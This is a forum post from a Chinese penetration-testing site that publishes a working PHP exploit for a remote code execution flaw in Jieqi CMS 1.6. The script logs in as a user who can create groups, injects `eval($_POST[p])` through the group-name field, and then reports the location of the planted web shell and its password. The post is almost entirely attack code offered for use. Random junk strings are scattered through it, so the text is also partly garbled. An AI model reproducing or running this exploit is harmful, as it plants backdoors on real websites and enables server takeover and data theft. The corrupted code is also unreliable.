中国网络渗透测试联盟

标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP [打印本页]

作者: admin    时间: 2013-2-23 11:28
标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。! A$ b& Z+ Y& @6 A* r. R. V

7 n+ r% m1 G0 _, `$ _) o
8 K6 i- d$ z) x; {1 ^1 n& p+ ~$ V该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
; u+ ?  U8 ]# Y, x5 P, H+ W 需要有一个能创建圈子的用户。% A5 |7 Y- v- g2 |, L8 Z
" m2 R! A: J: l7 C4 s
<?php( j. K- |3 Q! ~- \: k
" Z" h1 ]( [, m4 v7 I$ d
print_r('/ d% x6 t2 r: _
+---------------------------------------------------------------------------+
7 Y) O# G0 Q4 }9 `  @$ Q$ _Jieqi CMS V1.6 PHP Code Injection Exploit
& T( S1 ^6 D* c( ~. |; O8 zby flyh4t
+ H* w  }4 Y& {; [3 L  }mail: phpsec at hotmail dot com
& C5 J- w9 v9 w4 U$ z. U" m6 pteam: http://www.wolvez.org
4 N; P+ X" V* ~3 ~7 X( Q4 u# k+---------------------------------------------------------------------------+
2 r& T! h0 \. O. j) [6 W, T# c'); /**# P2 K9 l5 l# w7 u1 a$ n( q
* works regardless of php.ini settings
3 x  [7 `% |7 a  z. S% C- i*/ if ($argc < 5) { print_r('
: J5 i8 T5 K* a- H6 g; q/ E+---------------------------------------------------------------------------+
* Q1 S1 S2 y$ M' c3 a9 e1 [; |Usage: php '.$argv[0].' host path username9 a3 Y9 P9 T* ~/ G! {: l6 G
host:      target server (ip/hostname)% V' m3 ~; K1 i3 t; d  F
path:      path to jieqicms 0 x& j1 H5 F2 E' P( k3 b9 L
uasename:  a username who can create group
+ j5 L/ i6 O6 k- a, {4 _- [' tExample:
: `% U) M) M! E( `- {$ sphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password& E% h' K4 Y/ j7 K- l5 G2 O/ N6 G
+---------------------------------------------------------------------------+
6 O# l3 c! u$ {# p3 X'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
% @2 E" ?& W9 n3 L! qContent-Disposition: form-data; name="gname"
, R5 F: T# K$ U5 X* Q) W) W 5 @( N6 V( ?7 S; ]
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t7 o/ n6 x0 E5 i8 p+ k
-----------------------------23281168279961
! a0 {, G% R) P( W5 {. H+ e8 u# ~Content-Disposition: form-data; name="gcatid"
4 W9 n4 u* k" R 8 p6 P. N5 {! Z& N# k1 c
11 O( I$ F) K: K7 F+ W) e* C% A
-----------------------------23281168279961
, J8 U8 F- ]. }1 ^  uContent-Disposition: form-data; name="gaudit"
+ O) T! e$ Z' |! M! {; }, W
/ w, |/ Y) r. v+ k: W6 \" Y1" t9 m2 f/ V) r& c0 V% Q' ~
-----------------------------23281168279961
% v  x1 G6 Z& s5 X  i+ PContent-Disposition: form-data; name="gbrief"
# ]. B/ _( v% I9 h
6 y3 H+ H& T7 C1 {" L. n2 B  E! \$ K1
) k" e8 B7 g5 J# Z7 ^3 F/ X-----------------------------23281168279961--
0 l+ E7 s5 \8 q- V/ u8 _! @- {0 R6 e'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com! P. w, P6 V7 Z$ W8 X) g, s
+ o$ `$ m: F* N
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2